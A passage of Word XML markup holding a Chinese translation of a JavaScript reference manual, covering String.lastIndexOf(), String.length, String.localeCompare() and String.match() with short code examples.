      </w:pPr>
      <w:r>
        <w:t>要在字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中搜索的子串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个可选的整数参数，指定</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中搜索开始的位置。合法值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（该字符串中第一个字符的位置）到</w:t>
      </w:r>
      <w:r>
        <w:t>string.length-1</w:t>
      </w:r>
      <w:r>
        <w:t>（该字符串中最后一个字符的位置）。如果省略这个参数，它将从字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的最后一个字符开始搜索。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>子串</w:t>
      </w:r>
      <w:r>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t>在字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>位置之前最后一次出现的位置，如果没有找到则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</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String.lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>从字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的结尾开始搜索到开头，检查它是否包含子串</w:t>
      </w:r>
      <w:r>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t>。搜索开始于字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>位</w:t>
      </w:r>
      <w:r>
        <w:t>置，如果没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>则开始于</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的尾部。如果找到子串</w:t>
      </w:r>
      <w:r>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>String.lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回该子串的第一个字符的位置。由于本方法从字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的末尾搜索到开头，因此找到的第一个匹配子串将是</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>位置前的最后一个匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果没有找到指定子串，则</w:t>
      </w:r>
      <w:r>
        <w:t>String.lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，虽然</w:t>
      </w:r>
      <w:r>
        <w:t>String.lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>从字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的末尾搜索到开始，它仍然将</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的字符从开头开始编号。</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的第</w:t>
      </w:r>
      <w:r>
        <w:t>一个字符的位置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，最后一个的位置为</w:t>
      </w:r>
      <w:r>
        <w:t>string.length-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w: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String.charAt()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.substring()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="760" w:name="String_length"/>
      <w:r>
        <w:t>String.length</w:t>
      </w:r>
      <w:bookmarkEnd w:id="760"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个字符串的长度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.length</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个只读的整数，指明指定的字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的字符个数。对任意字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>来说，最后一个字符的索引都是</w:t>
      </w:r>
      <w:r>
        <w:t>s.length-1</w:t>
      </w:r>
      <w:r>
        <w:t>。字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性不会在</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环中枚举，也不可通过</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符删除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="761" w:name="String_localeCompare__"/>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>tring.localeCompare()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="761"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用本地特定的顺序比较两个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.localeCompare(target)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要与</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>使用区分地区设置的方式比较的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个表示比较结果的数字。如果</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:t>target“</w:t>
      </w:r>
      <w:r>
        <w:t>小</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>localCompare()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回一个比</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>小的数。如果</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:t>target“</w:t>
      </w:r>
      <w:r>
        <w:t>大</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，则本方法将返回一个比</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>大的数。如果这两个字符串相同，或者根据本地顺序约定无法区分，则本方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</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当在字符串上使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>操作符时，它们只比较这些字符的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>编码，而不考虑本地的顺序。这种方式产生的顺序并不总是正确。比如，在西班牙语中，字母</w:t>
      </w:r>
      <w:r>
        <w:t>"ch"</w:t>
      </w:r>
      <w:r>
        <w:t>习惯上当做一个单独的字母，排在字符</w:t>
      </w:r>
      <w:r>
        <w:t>"c"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"d"</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>localeCompare()</w:t>
      </w:r>
      <w:r>
        <w:t>提供了一个根据默认的本地排序来比较字符串的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准没有指定本地化比较如何完成，这个函数利用底层的操作系统提供的排序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>下面的代码将使用本地化顺序来排序一个字符串数组：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var strings;//</w:t>
      </w:r>
      <w:r>
        <w:t>待排序的字符串数组，已在别处初始化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>strings.sort(function(a,b){return a.localeCompare(b)});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="762" w:name="String_match__"/>
      <w:r>
        <w:t>String.match()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="762"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>找到一个或多个正则表达式匹配结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.match(regexp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个指定要匹配的模式的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果这个参数不是一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象，则它将先被传入</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，后转换为</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个包含匹配结果的数组。数组的内容取决于</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>是否设置了</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>属性。关于返回值的细节在下面的描述部分。</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match()</w:t>
      </w:r>
      <w:r>
        <w:t>在字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中寻找一个或多个</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>的匹配结果。这个方法的行为取决于</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>是否有</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>属性（关于正则表达式的完整细节请参阅第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>没有</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>将只在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中执行一次匹配。如果没有找到匹配结果，</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。在其他情况下，它将返回一个包含它所发现的匹配结果的信息的数组。该数组的元素</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>为匹配文本，剩下的元素为匹配正则表达式中的圆括号子表达式的文本。除了这些常规的数组元素，这个返回的数组还有两个额外的对象属性。其中</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>dex</w:t>
      </w:r>
      <w:r>
        <w:t>属性指明了匹配文本在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的开始位置；</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>属性则是对该</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>本身的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>regexp</w:t>
      </w:r>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>"g"</w:t>
      </w:r>
      <w:r>
        <w:t>标志，则</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>将执行一次全局搜索，在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中寻找所有匹配的子串。如果没有找到匹配结果则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，如果找到一个或多个匹配结果则返回一个数组。然而，全局匹配返回的数组的内容与非全局匹配返回的数组内容很不一样。在全局匹配的情况下，数组元素包含</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的每一个匹配子串，同时返回的数组没有</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>属性。注意对于全局匹配，</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>不会提供关于圆括号子表达</w:t>
      </w:r>
      <w:r>
        <w:t>式的信息，也不会记录每个匹配子串在</w:t>
      </w:r>
      <w:r>
        <w:t>stri</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ng</w:t>
      </w:r>
      <w:r>
        <w:t>中的位置。如果希望在全局搜索时取得这些信息，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.exec()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的全局匹配将找出一个字符串中的所有数字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"1 plus 2 equals 3".match(/\d+/g)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>["1","2","3"]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的非全局匹配使用更复杂的带有圆括号子表达式的正则表达式。它匹配一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，其子表达式则匹配对应的协议、主机以及该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的路径部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url=/(\w+):\/\/([\w.]+)\/(\S*)/;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>text="Visit my home page at http://www.isp.com/</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>david";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var result=text.match(url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(result!=null){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fullurl=result[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>"http://www.isp.com/</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>david"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var protocol=result[1];//</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>"http"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var host=result[2];//</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>"www.isp.com"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var path=result[3];//</w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>davi</w:t>
      </w:r>
      <w:r>
        <w:t>d"</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RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.exec()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.test()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.replace()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.search()</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="763" w:name="String_replace__"/>
      <w:r>
